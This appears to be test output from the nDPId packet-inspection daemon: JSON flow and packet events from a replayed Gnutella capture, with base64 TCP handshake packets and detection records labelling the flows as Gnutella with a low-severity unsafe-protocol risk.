+00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68108,"flow_last_seen":68108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68108,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":68108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68108,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bmJAAIAGaL8KAAIPdPGiosQyPT31tKkaAAAAAIAC+vCwPQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68108,"flow_last_seen":68108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68108,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.246.157.94","src_port":50227,"dst_port":51175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":68108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68108,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0K4hAAIAGtdgKAAIPb\/adXsQzx+daqkeOAAAAAIAC+vAsaAAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68109,"flow_last_seen":68109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68109,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":50228,"dst_port":14384,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":68109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68109,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KIlAAIAGNtsKAAIPb\/EfYMQ0ODBTVI35AAAAAIAC+vD7DAAAAgQFtAEDAwgBAQQC"} +00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68109,"flow_last_seen":68109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68109,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.36.249.91","src_port":50229,"dst_port":64920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":68109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68109,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vGxAAIAGN8kKAAIPAST5W8Q1\/ZgxDGGiAAAAAIAC+vAZFAAAAgQFtAEDAwgBAQQC"} +00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68110,"flow_last_seen":68110,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68110,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":50230,"dst_port":17296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":68110,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0BKBAAIAGOe0KAAIPSQNnJcQ2Q5DEXLK5AAAAAIAC+vA5CwAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68110,"flow_last_seen":68110,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68110,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.68.138.207","src_port":50231,"dst_port":45079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":68110,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZZlAAIAGsggKAAIPTESKz8Q3sBfW5xLuAAAAAIAC+vAy2AAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":68170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68170,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0k7pAAIAGcS8KAAIPJOnE4sQsDuwTBJqfAAAAAIAC+vD9iAAAAgQFtAEDAwgBAQQC"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":68368,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":68368,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAqgAAEAGVIJ08aKiCgACDz09xDIAcUgB9bSpG2AS\/\/+LwQAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":68368,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":68368,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobmNAAIAGaMoKAAIPdPGiosQyPT31tKkbAHFIAlAQ+vCojQAA"} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":68108,"flow_last_seen":68372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":68372,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":68425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":68425,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAqoAAP8GHcZv8R9gCgACDzgwxDQAAAAAU1SN+lAUAAA2vQAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":68935,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68935,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KIpAAIAGNtoKAAIPb\/EfYMQ0ODBTVI35AAAAAIAC+vD7DAAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZdpAAIAGUVsKAAIPtpuA5MQoDLg79XydAAAAAIAC+vCnHQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8NAAIAGrlMKAAIPcfxWosQp1q4KULlcAAAAAIAC+vBA7QAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FThAAIAG3SkKAAIPUMGrksQm0jCYt6bIAAAAAIAC+vCV5QAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EU9AAIAGi6AKAAIPWmf3XsQq5qXgntCpAAAAAIAC+vC6MQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Co1AAIAGJkcKAAIPfPRA7cQnEmB1c07JAAAAAIAC+vAPawAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":69092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gY9AAIAGBqAKAAIPwXmlDMQr2FBBRhZnAAAAAIAC+vANYQAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69141,"flow_last_seen":69141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69141,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":69141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69141,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0LcBAAIAGF3gKAAIPtpvy4cQ4Otw6vMh+AAAAAIAC+vC8QwAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69141,"flow_last_seen":69141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69141,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":50233,"dst_port":12854,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":69141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69141,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01LRAAIAGCWgKAAIPAaMO9sQ5MjZr2Fv\/AAAAAIAC+vCZMAAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.189.28.17","src_port":50234,"dst_port":16269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VPxAAIAGOusKAAIPQr0cEcQ6P42S8gLxAAAAAIAC+vBvlwAAAgQFtAEDAwgBAQQC"} +00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AgNAAIAGSRQKAAIPLVh2RsQ7GvpGaqL3AAAAAIAC+vD72gAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Z6pAAIAGohwKAAIPXR2H0cQ8GMo64wwuAAAAAIAC+vBfCgAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.123.202.175","src_port":50237,"dst_port":37910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lydAAIAGNGMKAAIPWHvKr8Q9lBZfEvXQAAAAAIAC+vCXrgAAAgQFtAEDAwgBAQQC"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":69169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69169,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAq8AAEAGhyBdHYfRCgACDxjKxDwAczwBOuMML2AS\/\/9GjAAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":69169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69169,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoZ6tAAIAGoicKAAIPXR2H0cQ8GMo64wwvAHM8AlAQ+vBjWAAA"} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69174,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":69174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":69182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69182,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArEAAEAGyG4tWHZGCgACDxr6xDsAdDYBRmqi+GAS\/\/\/pWwAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":69182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69182,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoAgRAAIAGSR8KAAIPLVh2RsQ7GvpGaqL4AHQ2AlAQ+vAGKAAA"} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":69182,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArgAAEAG3qdZSzQTCgACD7O6xBEAXroBd2GZhGAS\/\/+7lwAAAgQFtA=="} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArkAAEAG56stQVcYCgACDz9JxBAAXcABhPHErWAS\/\/\/6VgAAAgQFtA=="} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAroAAEAG+PjPJqPkCgACDxp6xA8AYK4B6qFHeGAS\/\/9Z9wAAAgQFtA=="} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArsAAEAG2+NQjD+TCgACD3NpxA4AX7QBeWsMs2AS\/\/+J8QAAAgQFtA=="} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":69360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArwAAEAGwoS2m\/LhCgACDzrcxDgAdioBOrzIf2AS\/\/+1wgAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69360,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoLcFAAIAGF4MKAAIPtpvy4cQ4Otw6vMh\/AHYqAlAQ+vDSjgAA"} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69141,"flow_last_seen":69361,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":69361,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 